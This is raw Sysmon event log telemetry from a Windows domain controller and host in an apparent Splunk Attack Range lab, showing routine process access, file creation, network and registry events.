07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050316Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050315Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050314Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050313Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050312Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050311Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050310Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001050384Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:13.437{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB469CF66E84188B5491CF10A8F31883,SHA256=9E6D66A4E20D3B59424D30940F139CD1ACEF61AC74970269831760ACE656A81E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808252Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:12.377{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57316-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808251Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:13.541{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8511433C4A224A4A4A4106FC0E79BAC,SHA256=07A271F27027283E6903D775027DD6875F5BE41C6417A4F332992685DB3562F2,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050386Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:06.708{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51082-false10.0.1.12-8000- 23542300x80000000000000001050385Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:14.452{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2F7E7DF15F45AB35F547C29C2C3AA0B,SHA256=C36310D52EDBCD54962CDFD247AE1964FF883E43FFF88BEF6D06C6BDAE0D83F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808253Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:14.549{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=755BD01282E8D7C093285CAB1A3D3B87,SHA256=BDEAB57E5519D545920F05DB5AFE72C7037A9ADF48228455338B60F7EA7BDF29,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050390Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:07.976{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local51083-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001050389Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:07.976{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local51083-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 23542300x80000000000000001050388Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:15.468{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F230AC7A0C7D85A1C68424C87701E3D,SHA256=BA22483E5AAE681EC44502210FDDB47151EFAE254D6ACBC7F055368F19186E70,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808254Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:15.549{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2F7C89D69C2367333F470F208050A57,SHA256=4299508E08DBF362B2399FA28082271DC338FC51EAFEEC2A840BD044BBEFE029,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050387Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:15.452{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=28E9E563EBA8F8475106C9F77C6C7FCA,SHA256=7119FB2AF74BAB80F13DE5221C9E619B3DDE2B04AAC284D307CEEE1864D13820,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808255Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:16.565{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A137DA94FF13EC2B9D51973E25F9AC4,SHA256=6B37A85F777293722F85EE285303AC4CCB636E0FB0C69CCAE5CB70ADCAB42611,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050392Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:08.047{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse184.105.247.196scan-15.shadowserver.org59144-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001050391Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:16.478{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=644E92FC3BE545CBC724BF022480FF51,SHA256=44822F9F061AC69C109A2C50A226782E0CC81F2CF470217A4966811080AF92A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050393Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:17.498{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DC522A9E2A22E5CFBF6B0E45D4964E6,SHA256=22D2A12617CA74D4B6B0AC12134053461441B4DCFCADE6D9AF7323C8077C53C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808256Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:17.565{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69B6D97CFE77D6FA618F281250DFE6EE,SHA256=F03FBA85603A02D67F1523FA77E388D4759092DFF0615C20B915C9E6789F279C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050395Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:18.514{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=171A2E4CF71BF6465695511C181CEACC,SHA256=9E1CA40555D4FDDDE886B746FA17CB4D43D154EA2486121D8158B7DD82302A29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808257Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:18.565{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F311A0D1ABB301F4E15812B4B794E670,SHA256=903A2DF0AAEAF131AA00A3FD3A150931C30F10F1DE70377269D0B9480C48B4A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050394Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:18.345{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808259Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:18.338{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57317-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808258Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:19.581{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1D3C2B8A9FE371BFEA4E9B0F6F59BCC,SHA256=0AC6AA3FC041DDE2C9F7347DF0145238F156A2308A60DABAEF8B9D9713688048,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050399Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:19.528{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45E58A1451E2121FDBB299BE068E53DB,SHA256=C56085810A7A983B2C8E0258E4A9F37C4732C71E54E88D7E23F49BDDA37400B5,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050398Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:10.317{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-890.attackrange.local49689-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x80000000000000001050397Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:10.317{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local56162- 354300x80000000000000001050396Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:10.316{466BC892-02AF-60E8-1300-00000000CF01}976C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local56162-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domain 23542300x8000000000000000808261Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:20.596{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808260Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:20.596{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7704BD53D74B585E56C81DB9FD98C7CA,SHA256=D0D4AC64CB97EA71D46788E2F9406C403A74A0EFAC2A0413B3C6B6EDE2A8E0CE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050401Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.730{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51084-false10.0.1.12-8000- 23542300x80000000000000001050400Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:20.529{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85AB8E7CCBB5F5FE4484555F2262E0EC,SHA256=12DEC23E937D63AEF339763C11596EDB5F8D8B052B9097DEEA1D8A3C9B189536,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808262Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:21.596{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29C678B9CBBA4AA79EA758FC851A1F0E,SHA256=E0E23DEBF521F93C45A549DEB4F7B6B3F39327F45C71F7794D977ED57FF0F73C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050402Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:21.530{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FEAABC71DC2A90E3C96B2D98AEF34F0A,SHA256=9A44F75664508A2F17ED2CBA8F9ED7C1569839379D2063D63D34D317011298DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808264Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:22.596{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A4702DE17739D1A1AE429AF003CFDDA,SHA256=80BD61CED8F117CAE247406EE57EF6EAF9089692D1A9C07284E4A407C2380224,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050404Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:22.560{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=304C8707B8C8010A6FF36E409584A4C6,SHA256=BD4DD9CE3DEBDB4FA69E80DFF9C0E1D5678448C550E62C8AE91B37F40DA87566,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808263Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:20.729{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57318-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 13241300x80000000000000001050403Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:56:22.376{466BC892-02AF-60E8-1000-00000000CF01}432C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d776f3-0x67f214da) 23542300x8000000000000000808265Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:23.612{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F879127EFF6C18D792A6AE6D6AA98F26,SHA256=C4F64DC85673D12D0E3EACFFE4A8FF49360701D6A200D13C9A9A01AFB920843F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050405Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:23.595{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=817A5D095A6D4B4C4C3AD85871488B55,SHA256=68EA845DB986F280FCD8ACAB39C6CA5ED2E48D674A2259314B551D244C0D4000,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050406Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:24.613{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66C0E248C2125EEEEFDB2B43948ABC84,SHA256=7D62B0C1986402C187D2D8FDC1D120C172431F05C62FB617AA639D8F828DBBEB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808293Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:24.862{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F5A8-60EB-9079-00000000D001}2316C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808292Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:24.862{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808291Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 